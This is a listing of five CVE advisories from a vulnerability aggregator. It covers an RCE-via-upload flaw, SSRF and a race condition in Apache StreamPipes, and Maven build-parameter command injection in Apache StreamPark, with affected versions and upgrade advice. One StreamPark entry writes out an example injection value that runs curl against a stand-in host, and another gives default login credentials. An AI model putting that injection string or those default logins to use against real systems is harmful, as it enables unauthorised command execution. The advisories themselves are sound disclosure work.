CVE-2024-31411 – Apache StreamPipes: Potential remote code execution (RCE) via file upload
https://notcve.org/view.php?id=CVE-2024-31411
Unrestricted Upload of File with dangerous type vulnerability in Apache StreamPipes. Such a dangerous type might be an executable file that may lead to a remote code execution (RCE). The unrestricted upload is only possible for authenticated and authorized users. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue. • https://lists.apache.org/thread/b0657okbwzg5xxs11hphvc9qrd9s70mt • CWE-434: Unrestricted Upload of File with Dangerous Type •
CVE-2024-31979 – Apache StreamPipes: Possibility of SSRF in pipeline element installation process
https://notcve.org/view.php?id=CVE-2024-31979
Server-Side Request Forgery (SSRF) vulnerability in Apache StreamPipes during installation process of pipeline elements. Previously, StreamPipes allowed users to configure custom endpoints from which to install additional pipeline elements. These endpoints were not properly validated, allowing an attacker to get StreamPipes to send an HTTP GET request to an arbitrary address. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue. • https://lists.apache.org/thread/8lryp3bxnby9kmk13odkz2jbfdjfvf0y • CWE-918: Server-Side Request Forgery (SSRF) •
CVE-2024-30471 – Apache StreamPipes: Potential creation of multiple identical accounts
https://notcve.org/view.php?id=CVE-2024-30471
Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache StreamPipes in user self-registration. This allows an attacker to potentially request the creation of multiple accounts with the same email address until the email address is registered, creating many identical users and corrupting StreamPipe's user management. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue. • https://lists.apache.org/thread/8yodrmohgcybq900or3d4hc1msl230fr • CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition •
CVE-2024-29737 – Apache StreamPark (incubating): maven build params could trigger remote command execution
https://notcve.org/view.php?id=CVE-2024-29737
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4 Background info: Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. • http://www.openwall.com/lists/oss-security/2024/07/17/2 https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5 • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') •
CVE-2023-52291 – Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
https://notcve.org/view.php?id=CVE-2023-52291
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4, The "<" operator will blocked。 En Streampark, el módulo del proyecto integra las capacidades de compilación de Maven. • http://www.openwall.com/lists/oss-security/2024/07/17/1 https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') •